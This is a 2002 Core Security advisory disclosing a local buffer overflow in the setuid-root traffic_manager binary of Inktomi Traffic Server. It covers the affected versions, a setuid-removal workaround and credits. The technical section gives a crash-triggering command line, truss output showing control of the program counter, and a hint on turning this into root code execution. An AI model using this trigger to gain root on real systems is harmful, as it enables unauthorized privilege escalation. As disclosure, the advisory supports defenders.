CORE SECURITY TECHNOLOGIES
http://www.corest.com
Vulnerability Report For
Inktomi Traffic Server
Date Published: 2002-07-02
Advisory ID: CORE-20020620
Bugtraq ID: 5098
CVE CAN: None currently assigned.
Title: Inktomi Traffic Server traffic_manager local overflow.
Class: Boundary error condition (buffer overflow)
Remotely Exploitable: NO
Locally Exploitable: Yes
Vendors contacted:
Inktomi Corporation (INKT)
. Inital email sent: 2002-06-21
. Acknowledged reception of initial contact: 2002-06-24
. Official response and fix information: 2002-07-01
Release mode: COORDINATED RELEASE
*Vulnerability Description*
Inktomi's Traffic Server product provides transparent web caching,
access control and content filtering. It is available for Linux, Solaris
and Windows platforms. A vulnerability that could allow a local attacker to
gain root access has been discovered in the unix version of the software.
Problem: Buffer overflow in traffic_manager executable
The traffic_manager executable is used to manage Traffic Server,
it is installed setuid-root by default under the [installpath]/bin
directory.
When traffic_manager is executed with a long command line argument,
a buffer overflow occurs.
This vulnerability can be exploited locally to gain root access.
A local exploit module is available for CORE IMPACT customers in
the July 2002 update pack.
*Vulnerable Packages/Systems*
The local root vulnerability in traffic_manager exists
in all current and previous revisions of Inktomi Traffic Server,
Traffic Edge and Media-IXT.
Current product revisions are:
Media-IXT 3.0.4
Traffic Server / Media-IXT 4.0.18
Traffic Server / Media-IXT 4.0.20
Traffic Server / Media-IXT 5.1.3
Traffic Server / Media-IXT 5.2.0-R
Traffic Server / Media-IXT 5.2.1
Traffic Server / Media-IXT 5.2.2
Traffic Edge 1.1.2 (Traffic Server 5.2.1)
Traffic Edge 1.5.0 (Traffic Server 5.5)
*Solution/Vendor Information/Workaround*
The buffer overflow error in the "-path" option of the
traffic_manager command will be corrected to remove the
vulnerability in all future maintenance releases of
Traffic Server, Media-IXT and Traffic Edge.
The identified vulnerability applies to command-line
execution of bin/traffic_manager, so the risk applies only
to shell sessions already connected to the proxy host as
non-privileged users. The vulnerability does not affect
network services or access and cannot grant remote access to
the proxy host.
If you wish to block this local vulnerability, remove the
setuid bit from the traffic_manager executable. When
traffic_manager is not setuid root, the proxy will not be able
to directly serve 'privileged' port numbers less than 1024.
Some proxy configurations will require ARM config/ipnat.conf
Please refer to Inktomi's note on the bug at
http://support.inktomi.com/kb/070202-003.html
with specific instructions on how to reconfigure the
products to operate properly without the SUID flag set
on the binary.
Contact emailsupport@inktomi.com for assistance
*Credits*
This vulnerability was discovered by Juliano Rizzo of the
Security Consulting Services team at CORE SECURITY TECHNOLOGIES
We would like to thank Warren Brown from Inktomi Product Support
for the quick response to the issue.
*Technical Description - Exploit/Concept Code*
Traffic Manager installs the traffic_manager program as a root
owned file with the set user id bit set.
Below are the lines from install.sh that makes traffic_manager
setuid-root.
----
# Adjust setuid commands
chown root ${InstallDir}/bin/traffic_manager >>$LogFile 2>&1
chmod 4755 ${InstallDir}/bin/traffic_manager >>$LogFile 2>&1
if [ -d ${InstallDir}/bin/debug ] ; then
chown root ${InstallDir}/bin/debug/traffic_manager >>$LogFile 2>&1
chmod 4755 ${InstallDir}/bin/debug/traffic_manager >>$LogFile 2>&1
fi
----
The overflow occurs when a string longer than 1700 bytes is passed
as argument to the -path option. The exploitability has been confirmed
under Solaris platform.
/inktomi/5.1.3/bin# ./traffic_manager -path `perl -e 'print "A"x1720'` <
[TrafficManager] ==> Kernel Sig 11; Reason: 1
[TrafficManager] ==> Cleaning up and reissuing signal #11
Abort(coredump)
truss output:
open64("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAA", O_RDONLY) Err#78 ENAMETOOLONG
fstat(3, 0xFFBEC130) = 0
time() = 1024660377
getpid() = 27458 [27457]
putmsg(3, 0xFFBEB7E8, 0xFFBEB7DC, 0) = 0
open("/var/run/syslog_door", O_RDONLY) Err#2 ENOENT
Incurred fault #5, FLTACCESS %pc = 0xFF0CF2E0
siginfo: SIGBUS BUS_ADRALN addr=0x41414149
Received signal #10, SIGBUS [caught]
siginfo: SIGBUS BUS_ADRALN addr=0x41414149
Replacing 0x41414141 for a valid stack address and building the right
string it is posible to execute arbitrary code with root privileges.
DISCLAIMER:
The contents of this advisory are copyright (c) 2002 CORE SECURITY
TECHNOLOGIES
and may be distributed freely provided that no fee is charged for this
distribution and proper credit is given.
$Id: InktomiTS-pathbof-advisory.txt,v 1.5 2002/07/02 21:11:40 iarce Exp $
---
Perscriptio in manibus tabellariorum est
Noli me vocare, ego te vocabo
Ivan Arce
CTO
CORE SECURITY TECHNOLOGIES
44 Wall Street - New York, NY 10005
Ph: (212) 461-2345
Fax: (212) 461-2346
http://www.corest.com
PGP Fingerprint: C7A8 ED85 8D7B 9ADC 6836 B25D 207B E78E 2AD1 F65A
--- for a personal reply use: =?iso-8859-1?Q?Iv=E1n_Arce?= <ivan.arce@corest.com>
